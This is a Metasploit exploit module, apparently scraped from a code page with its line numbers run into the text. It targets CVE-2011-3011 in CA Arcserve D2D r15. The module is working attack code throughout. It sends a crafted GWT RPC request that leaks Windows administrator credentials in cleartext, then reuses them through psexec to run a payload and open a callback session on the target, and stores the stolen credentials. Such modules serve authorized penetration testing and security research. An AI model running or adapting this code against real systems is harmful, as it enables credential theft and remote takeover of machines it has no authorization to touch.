Path: blob/master/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Auxiliary::Report1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'CA Arcserve D2D GWT RPC Credential Information Disclosure',16'Description' => %q{17This module exploits an information disclosure vulnerability in the CA Arcserve18D2D r15 web server. The information disclosure can be triggered by sending a19specially crafted RPC request to the homepage servlet. This causes CA Arcserve to20disclosure the username and password in cleartext used for authentication. This21username and password pair are Windows credentials with Administrator access.22},23'Author' => [24'bannedit', # metasploit module25'rgod', # original public exploit26],27'License' => MSF_LICENSE,28'References' => [29[ 'CVE', '2011-3011' ],30[ 'OSVDB', '74162' ],31[ 'EDB', '17574' ]32],33'DefaultOptions' => {34'EXITFUNC' => 'process'35},36'Privileged' => true,37'Payload' => {38'Space' => 1000,39'BadChars' => "\x00\x0d\x0a"40},41'Platform' => 'win',42'Targets' => [43[ 'Automatic', {} ],44],45'DisclosureDate' => '2011-07-25',46'DefaultTarget' => 0,47'Notes' => {48'Reliability' => UNKNOWN_RELIABILITY,49'Stability' => UNKNOWN_STABILITY,50'SideEffects' => UNKNOWN_SIDE_EFFECTS51}52)53)5455register_options(56[57Opt::RPORT(8014),58]59)60end6162def service_details63super.merge({64port: 445,65service_name: 'smb',66post_reference_name: self.refname,67last_attempted_at: DateTime.now68})69end7071def exploit72print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")7374data = "5|0|4|"75data << "http://#{datastore['RHOST']}:#{datastore['RPORT']}"76data << "/contents/"77data << "|2C6B33BED38F825C48AE73C093241510|"78data << "com.ca.arcflash.ui.client.homepage.HomepageService"79data << "|getLocalHost|1|2|3|4|0|"8081cookie = "donotshowgettingstarted=%7B%22state%22%3Atrue%7D"8283res = send_request_raw({84'uri' => '/contents/service/homepage',85'version' => '1.1',86'method' => 'POST',87'cookie' => cookie,88'data' => data,89'headers' =>90{91'Content-Type' => "text/x-gwt-rpc; charset=utf-8",92'Content-Length' => data.length93}94}, 5)9596if not res97fail_with(Failure::NotFound, 'The server did not respond to our request')98end99100resp = res.to_s.split(',')101102user_index = resp.index("\"user\"")103pass_index = resp.index("\"password\"")104105if user_index.nil? and pass_index.nil?106# Not a vulnerable server (blank user/pass doesn't help us)107fail_with(Failure::NotFound, 'The server did not return credentials')108end109110user = resp[user_index + 1].gsub(/\"/, "")111pass = ""112113if pass_index114pass = resp[pass_index + 1].gsub(/\"/, "")115end116117srvc = {118:host => datastore['RHOST'],119:port => datastore['RPORT'],120:proto => 'tcp',121:name => 'http',122:info => res.headers['Server'] || ""123}124report_service(srvc)125if user.nil? or pass.nil?126print_error("Failed to collect the username and password")127return128end129130print_good("Collected credentials User: '#{user}' Password: '#{pass}'")131132# try psexec on the remote host133psexec = framework.exploits.create("windows/smb/psexec")134psexec.register_parent(self)135136psexec.datastore['PAYLOAD'] = self.datastore['PAYLOAD']137138if self.datastore['LHOST'] and self.datastore['LPORT']139psexec.datastore['LHOST'] = self.datastore['LHOST']140psexec.datastore['LPORT'] = self.datastore['LPORT']141end142143psexec.datastore['RHOST'] = self.datastore['RHOST']144145psexec.datastore['DisablePayloadHandler'] = true146psexec.datastore['SMBPass'] = pass147psexec.datastore['SMBUser'] = user148149print_status("Attempting to login via windows/smb/psexec")150151# this is kind of nasty would be better to split psexec code out to a mixin (on the TODO List)152begin153psexec.exploit_simple(154'LocalInput' => self.user_input,155'LocalOutput' => self.user_output,156'Payload' => psexec.datastore['PAYLOAD'],157'RunAsJob' => true158)159rescue160credential_data = {161user: user,162private_data: pass,163status: Metasploit::Model::Login::Status::INCORRECT164}.merge(service_details)165create_credential_and_login(credential_data)166167print_error("Login attempt using windows/smb/psexec failed")168print_status("Credentials have been stored and may be useful for authentication against other services.")169# report the auth170return171end172173# report the auth174credential_data = {175user: user,176private_data: pass,177status: Metasploit::Model::Login::Status::SUCCESSFUL178}.merge(service_details)179create_credential_and_login(credential_data)180181handler182end183end184185186